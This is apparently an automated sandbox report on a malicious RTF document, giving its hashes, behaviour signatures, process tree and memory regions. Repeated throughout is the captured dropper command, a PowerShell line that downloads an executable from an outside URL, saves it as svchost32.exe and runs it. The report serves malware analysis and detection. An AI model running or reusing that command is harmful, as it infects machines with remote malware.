Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    125s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21/09/2024, 01:59

General

  • Target

    eedc2afd6e99aa74cb24b9afe046dc68_JaffaCakes118.rtf

  • Size

    675KB

  • MD5

    eedc2afd6e99aa74cb24b9afe046dc68

  • SHA1

    ee028e27c4f1282b2f061e96ae62dddfdd5fb95d

  • SHA256

    70ebcc2aa157230051490f5480d49dcef22ad8c26be1307ad8eab63bd4233c40

  • SHA512

    aa176a42dff8ae0612dd57f681a56d2842c9f14a81efdc59bca854f53b8ced58d3048938a71a909bdb2ad378b9766f89c0ba454dc35ae20e65ce0b7864fdee61

  • SSDEEP

    6144:9YZ/EO/1IDPWCh0FzlAifCjE720Sli19W0L/dU3x1JCUIB8emF:uZV/1a+W9fd+9vLFxUJeu

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://fast-cargo.com/images/file/58.exe

Signatures

  • Process spawned unexpected child process 10 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

    Using powershell.exe command.

  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 31 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 20 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 42 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\eedc2afd6e99aa74cb24b9afe046dc68_JaffaCakes118.rtf"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2688
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2100
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1540
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2328
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2780
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1636
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1972
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1872
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:688
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1084
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1448
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:612
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2364
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2468
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2608
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2824
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1892
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:772
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2444
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1476
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1664
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/58.exe','C:\Users\Admin\AppData\Local\Temp\svchost32.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\svchost32.exe'
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:560
    • C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
      "C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      PID:692
    • C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
      "C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      PID:2572
    • C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
      "C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      PID:1416
    • C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
      "C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      PID:900
    • C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
      "C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      PID:2076
    • C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
      "C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      PID:2840
    • C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
      "C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      PID:2684
    • C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
      "C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      PID:2804
    • C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
      "C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      PID:2620
    • C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe
      "C:\Program Files (x86)\Microsoft Office\Office14\excelcnv.exe" -Embedding
      1⤵
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      PID:2280

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\svchost32.exe

      Filesize

      114B

      MD5

      e89f75f918dbdcee28604d4e09dd71d7

      SHA1

      f9d9055e9878723a12063b47d4a1a5f58c3eb1e9

      SHA256

      6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023

      SHA512

      8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      6cb3504b0eac5834af1f7c2cd9b78812

      SHA1

      dec24bfd7f8b03e8041e0cdb83b8be17e744d86d

      SHA256

      e82fb63979fced3c6d61e59aeb5e47349fd97865779553e28d493cbe3f66ae01

      SHA512

      02019ec89652dd9d8f0fe47bf689490548b68b84d79d765584c62e369255c98b7f1f2e98975b3fea008b18854fba3aad92db9bd3d75aa8cf0d912685849e40d9

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      f7fded24bbb7874e2c2a2d30abf28286

      SHA1

      ab92ac7a572d746a45e370e64126a4c9211be6ed

      SHA256

      3c3726c9a249cff6f498926e0184febdfff5d3ac843b1d8f885033a9ada60680

      SHA512

      2d20883644b59f6fa135ead4c7454024b1f8295562677e22b4b5f153c674118501793c7f3519cec10ff135bb89ab05b1e992235bbef05054da32566032b28792

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      7fd24c6116b4db42d40f38214aa18b62

      SHA1

      053928fd9937d7b4491bc1e9d8fea376038630c1

      SHA256

      f30fa45f7d41979b7e8f637213805f3d27c3a9e28994091e2a7e53f8334f2801

      SHA512

      03c105463e1eef55fbdf1f9d85ceb70b3b546f357f0e5fbd1a85dc3a4da8074ddee01cc0437fd16f74edaeb43caafb3397aa08068829c40e1596641c4d50dc87

    • memory/1540-10-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1540-7-0x0000000070C5D000-0x0000000070C68000-memory.dmp

      Filesize

      44KB

    • memory/1540-16-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1540-17-0x0000000070C5D000-0x0000000070C68000-memory.dmp

      Filesize

      44KB

    • memory/1540-9-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1540-8-0x0000000000490000-0x0000000000590000-memory.dmp

      Filesize

      1024KB

    • memory/1664-126-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/1664-125-0x00000000004D0000-0x00000000005D0000-memory.dmp

      Filesize

      1024KB

    • memory/1892-99-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/1892-100-0x0000000000540000-0x0000000000640000-memory.dmp

      Filesize

      1024KB

    • memory/1972-34-0x0000000000670000-0x0000000000770000-memory.dmp

      Filesize

      1024KB

    • memory/1972-33-0x0000000000670000-0x0000000000770000-memory.dmp

      Filesize

      1024KB

    • memory/2444-112-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/2444-113-0x00000000004F0000-0x00000000005F0000-memory.dmp

      Filesize

      1024KB

    • memory/2608-86-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2608-87-0x00000000004B0000-0x00000000005B0000-memory.dmp

      Filesize

      1024KB

    • memory/2688-0-0x000000002F541000-0x000000002F542000-memory.dmp

      Filesize

      4KB

    • memory/2688-2-0x0000000070C5D000-0x0000000070C68000-memory.dmp

      Filesize

      44KB

    • memory/2688-27-0x0000000070C5D000-0x0000000070C68000-memory.dmp

      Filesize

      44KB

    • memory/2688-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2688-179-0x0000000070C5D000-0x0000000070C68000-memory.dmp

      Filesize

      44KB